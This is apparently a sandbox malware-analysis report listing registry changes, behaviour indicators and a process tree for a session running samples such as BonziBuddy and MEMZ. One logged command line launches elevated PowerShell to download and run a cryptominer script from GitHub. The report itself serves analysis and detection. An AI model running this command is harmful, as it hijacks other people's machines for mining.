Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E91E27A2-C5AE-11D2-8D1B-00104B9E072A}\TypeLib	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BDB-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\Version = "2.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93C80-7B81-11D0-AC5F-00C04FD97575}\ = "IAgentUserInput"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB35CBB6-A1BC-11D3-8F99-00104BA312D6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	BonziBDY_2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCE47F78-8A6C-4C6D-A6F7-8BE4427127C4}\TypeLib\Version = "1.0"	BonziBuddy432.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B0913410-3B44-11D1-ACBA-00C04FD97575}\ = "IAgentCtlCommandEx"	regsvr32.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
6096	reg.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 751202.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 9226.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 957178.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5048	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2320	msedge.exe
2320	msedge.exe
2244	msedge.exe
2244	msedge.exe
4924	identity_helper.exe
4924	identity_helper.exe
1276	msedge.exe
1276	msedge.exe
3000	msedge.exe
3000	msedge.exe
5860	identity_helper.exe
5860	identity_helper.exe
5040	msedge.exe
5040	msedge.exe
4440	msedge.exe
4440	msedge.exe
4440	msedge.exe
4440	msedge.exe
5316	msedge.exe
5316	msedge.exe
232	msedge.exe
232	msedge.exe
3624	msedge.exe
3624	msedge.exe
3900	msedge.exe
3900	msedge.exe
3164	msedge.exe
3164	msedge.exe
4104	mspaint.exe
4104	mspaint.exe
1416	msiexec.exe
1416	msiexec.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe
6308	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
6308	taskmgr.exe
5884	MEMZ.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5316	7zG.exe
Token: 35	5316	7zG.exe
Token: SeSecurityPrivilege	5316	7zG.exe
Token: SeSecurityPrivilege	5316	7zG.exe
Token: SeShutdownPrivilege	5284	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	5284	MSIEXEC.EXE
Token: SeSecurityPrivilege	1416	msiexec.exe
Token: SeCreateTokenPrivilege	5284	MSIEXEC.EXE
Token: SeAssignPrimaryTokenPrivilege	5284	MSIEXEC.EXE
Token: SeLockMemoryPrivilege	5284	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	5284	MSIEXEC.EXE
Token: SeMachineAccountPrivilege	5284	MSIEXEC.EXE
Token: SeTcbPrivilege	5284	MSIEXEC.EXE
Token: SeSecurityPrivilege	5284	MSIEXEC.EXE
Token: SeTakeOwnershipPrivilege	5284	MSIEXEC.EXE
Token: SeLoadDriverPrivilege	5284	MSIEXEC.EXE
Token: SeSystemProfilePrivilege	5284	MSIEXEC.EXE
Token: SeSystemtimePrivilege	5284	MSIEXEC.EXE
Token: SeProfSingleProcessPrivilege	5284	MSIEXEC.EXE
Token: SeIncBasePriorityPrivilege	5284	MSIEXEC.EXE
Token: SeCreatePagefilePrivilege	5284	MSIEXEC.EXE
Token: SeCreatePermanentPrivilege	5284	MSIEXEC.EXE
Token: SeBackupPrivilege	5284	MSIEXEC.EXE
Token: SeRestorePrivilege	5284	MSIEXEC.EXE
Token: SeShutdownPrivilege	5284	MSIEXEC.EXE
Token: SeDebugPrivilege	5284	MSIEXEC.EXE
Token: SeAuditPrivilege	5284	MSIEXEC.EXE
Token: SeSystemEnvironmentPrivilege	5284	MSIEXEC.EXE
Token: SeChangeNotifyPrivilege	5284	MSIEXEC.EXE
Token: SeRemoteShutdownPrivilege	5284	MSIEXEC.EXE
Token: SeUndockPrivilege	5284	MSIEXEC.EXE
Token: SeSyncAgentPrivilege	5284	MSIEXEC.EXE
Token: SeEnableDelegationPrivilege	5284	MSIEXEC.EXE
Token: SeManageVolumePrivilege	5284	MSIEXEC.EXE
Token: SeImpersonatePrivilege	5284	MSIEXEC.EXE
Token: SeCreateGlobalPrivilege	5284	MSIEXEC.EXE
Token: SeShutdownPrivilege	5048	explorer.exe
Token: SeCreatePagefilePrivilege	5048	explorer.exe
Token: SeBackupPrivilege	992	vssvc.exe
Token: SeRestorePrivilege	992	vssvc.exe
Token: SeAuditPrivilege	992	vssvc.exe
Token: SeBackupPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeBackupPrivilege	5748	srtasks.exe
Token: SeRestorePrivilege	5748	srtasks.exe
Token: SeSecurityPrivilege	5748	srtasks.exe
Token: SeTakeOwnershipPrivilege	5748	srtasks.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe
Token: SeTakeOwnershipPrivilege	1416	msiexec.exe
Token: SeRestorePrivilege	1416	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
2244	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3620	ButterflyOnDesktop.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
6308	taskmgr.exe

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
2872	BonziBuddy432.exe
4104	mspaint.exe
4104	mspaint.exe
4104	mspaint.exe
4104	mspaint.exe
4104	mspaint.exe
5868	MSAGENT.EXE
5840	tv_enua.exe
1872	AgentSvr.exe
6404	Pingu.exe
6404	Pingu.exe
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
1160	BonziBDY_2.EXE
1160	BonziBDY_2.EXE
4700	Pingu.exe
4700	Pingu.exe
5420	VineMemz.exe
5884	MEMZ.exe
2792	@[email protected]
2792	@[email protected]
1944	@[email protected]
1944	@[email protected]
5724	@[email protected]
5724	@[email protected]
4472	@[email protected]
5400	@[email protected]
4092	@[email protected]
1848	@[email protected]
6192	tree.exe
5860	@[email protected]
6952	@[email protected]
4832	@[email protected]
7416	iexplore.exe
7416	iexplore.exe
7576	IEXPLORE.EXE
7576	IEXPLORE.EXE
8168	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2356	2244	msedge.exe	83
PID 2244 wrote to memory of 2356	2244	msedge.exe	83
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 780	2244	msedge.exe	84
PID 2244 wrote to memory of 2320	2244	msedge.exe	85
PID 2244 wrote to memory of 2320	2244	msedge.exe	85
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86
PID 2244 wrote to memory of 1980	2244	msedge.exe	86

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5532	attrib.exe
1324	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
  2⤵
  PID:2356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
  2⤵
  PID:780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
  2⤵
  PID:1980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
  2⤵
  PID:536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
  2⤵
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1
  2⤵
  PID:1004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2212,6814581757488280762,425425887542659919,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5672 /prefetch:8
  2⤵
  PID:3352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1680

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:3636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
  2⤵
  PID:1640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
  2⤵
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
  2⤵
  PID:5260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
  2⤵
  PID:5272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3916 /prefetch:8
  2⤵
  PID:5852
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
